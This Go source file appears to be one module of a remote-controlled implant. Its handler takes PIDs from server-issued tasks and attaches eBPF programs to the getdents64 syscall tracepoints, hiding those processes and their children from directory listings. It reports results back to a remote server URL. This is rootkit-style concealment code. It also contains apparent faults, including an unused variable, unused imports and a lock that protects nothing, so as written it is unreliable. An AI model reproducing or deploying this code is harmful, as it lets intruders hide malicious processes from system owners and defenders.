//go:build linux

package agent_helper

import (
	"bytes"
	"context"
	"encoding/binary"
	"fmt"
	"log"
	"os"
	"os/signal"
	"sync"
	"slices"
	"strconv"
	"strings"
	"syscall"

	"github.com/cilium/ebpf/link"
	"github.com/cilium/ebpf/ringbuf"
	"github.com/cilium/ebpf/rlimit"
)

const (
	prog01 = 1
	prog02 = 2

	maxPIDLen = 16
)

type event struct {
	Pid     int32
	Comm    [16]byte
	Success uint8
	_       [3]byte // C struct alignment
}

type Worker struct {
	cancel context.CancelFunc
	done chan struct{}
}

type SafeCounter struct {
	mu sync.Mutex
}

var (
	pidsHidden = []int{}
)

func (w *Worker) Stop() {
	w.cancel()
	<-w.done
}

func argsToPids(args string) (int, int, error) {
	argsParts := strings.Fields(args)
	if len(argsParts) != 2 {
		return 0, 0, fmt.Errorf("invalid args: %s", args)
	}

	pid, err := strconv.Atoi(argsParts[0])
	if err != nil {
		return 0, 0, fmt.Errorf("invalid PID: %s, error: %v", args, err)
	}
	targetPPID, err := strconv.Atoi(argsParts[1])
	if err != nil {
		return 0, 0, fmt.Errorf("invalid PPID: %s, error: %v", args, err)
	}

	if slices.Contains(pidsHidden, pid) {
		return 0, 0, fmt.Errorf("pid %s is already hidden", args)
	}
	return pid, targetPPID, nil
}

func startWorker(ctx context.Context, reader *ringbuf.Reader, cleanup func()) *Worker {
    ctx, cancel := context.WithCancel(ctx)

    w := &Worker{
        cancel: cancel,
        done:   make(chan struct{}),
    }

    go func() {
        defer close(w.done)
        defer cleanup()

        go func() {
            <-ctx.Done()
            reader.Close()
        }()

        for {
            record, err := reader.Read()
            if err != nil {
                if ctx.Err() != nil {
                    return
                }

                log.Printf("ringbuf read: %v", err)
                continue
            }

            var e event
            if err := binary.Read(
                bytes.NewReader(record.RawSample),
                binary.LittleEndian,
                &e,
            ); err != nil {
                log.Printf("decode event: %v", err)
                continue
            }

            comm := strings.TrimRight(string(e.Comm[:]), "\x00")
            log.Printf("pid=%d comm=%s success=%t",
                e.Pid, comm, e.Success != 0)
        }
    }()

    return w
}

// args come in as pid (to hide) and ppid (to hide all children of that pid) space separated.
func PidHiderHandler(serverUrl string, taskData map[string]interface{}) {
	args := strings.TrimSpace(strings.ToLower(taskData["args"].(string)))

	pid, targetPPID, err := argsToPids(args)
	if err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("%v", err))
		return
	}

	/*
		Older kernels may account BPF objects against RLIMIT_MEMLOCK.
	*/
	if err := rlimit.RemoveMemlock(); err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("remove memlock: %v", err))
		return
	}

	/*
		Load the CollectionSpec generated by bpf2go.

		This does NOT load anything into the kernel yet.
	*/
	spec, err := loadBpf()
	if err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("load BPF spec: %v", err))
		return
	}

	/*
		Equivalent to the following from pidhide.c:

		  skel->rodata->pid_to_hide
		  skel->rodata->pid_to_hide_len
		  skel->rodata->target_ppid
	*/

	pidString := strconv.Itoa(pid)

	if len(pidString)+1 > maxPIDLen {
		DataShipper(serverUrl, taskData, fmt.Sprintf("pid string too large: %d", len(pidString)+1))
		return
	}

	var pidBuffer [maxPIDLen]byte
	copy(pidBuffer[:], pidString)

	if err := spec.Variables["pid_to_hide"].Set(pidBuffer); err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("set pid_to_hide: %v", err))
		return
	}

	if err := spec.Variables["pid_to_hide_len"].Set(
		int32(len(pidString) + 1),
	); err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("set pid_to_hide_len: %v", err))
		return
	}

	if err := spec.Variables["target_ppid"].Set(
		int32(targetPPID),
	); err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("set target_ppid: %v", err))
		return
	}

	/*
		Load maps/programs into the kernel.

		bpfObjects is generated by bpf2go.
	*/
	var objs bpfObjects

	if err := spec.LoadAndAssign(&objs, nil); err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("load BPF objects: %v", err))
		return
	}

	/*
		Populate the program-array map.

		This corresponds to the two bpf_map_update_elem()
		calls in the original C loader.

		    slot 1 -> handle_getdents_exit
		    slot 2 -> handle_getdents_patch
	*/

	if err := objs.MapProgArray.Put(
		uint32(prog01),
		uint32(objs.HandleGetdentsExit.FD()),
	); err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("install tail call 1: %v", err))
		return
	}

	if err := objs.MapProgArray.Put(
		uint32(prog02),
		uint32(objs.HandleGetdentsPatch.FD()),
	); err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("install tail call 2: %v", err))
		return
	}

	/*
		Attach syscall ENTER.
	*/
	enterLink, err := link.Tracepoint(
		"syscalls",
		"sys_enter_getdents64",
		objs.HandleGetdentsEnter,
		nil,
	)
	if err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("attach enter tracepoint: %v", err))
		return
	}

	/*
		Attach syscall EXIT.

		Notice that HandleGetdentsPatch is NOT attached.
		It is reached only via tail call.
	*/
	exitLink, err := link.Tracepoint(
		"syscalls",
		"sys_exit_getdents64",
		objs.HandleGetdentsExit,
		nil,
	)
	if err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("attach exit tracepoint: %v", err))
		return
	}

	/*
		Ring-buffer reader.

		Equivalent to ring_buffer__new() +
		ring_buffer__poll() in the C version.
	*/
	reader, err := ringbuf.NewReader(objs.Rb)
	if err != nil {
		DataShipper(serverUrl, taskData, fmt.Sprintf("open ring buffer: %v", err))
		return
	}

	// at this point the pid is hidden 
	var c = SafeCounter{}
	c.mu.Lock()
	pidsHidden = append(pidsHidden, pid)
	c.mu.Unlock()

	worker := startWorker(agentCtx, reader,
		func() {
			reader.Close()
			exitLink.Close()
			enterLink.Close()
			objs.Close()
		},
	)
}
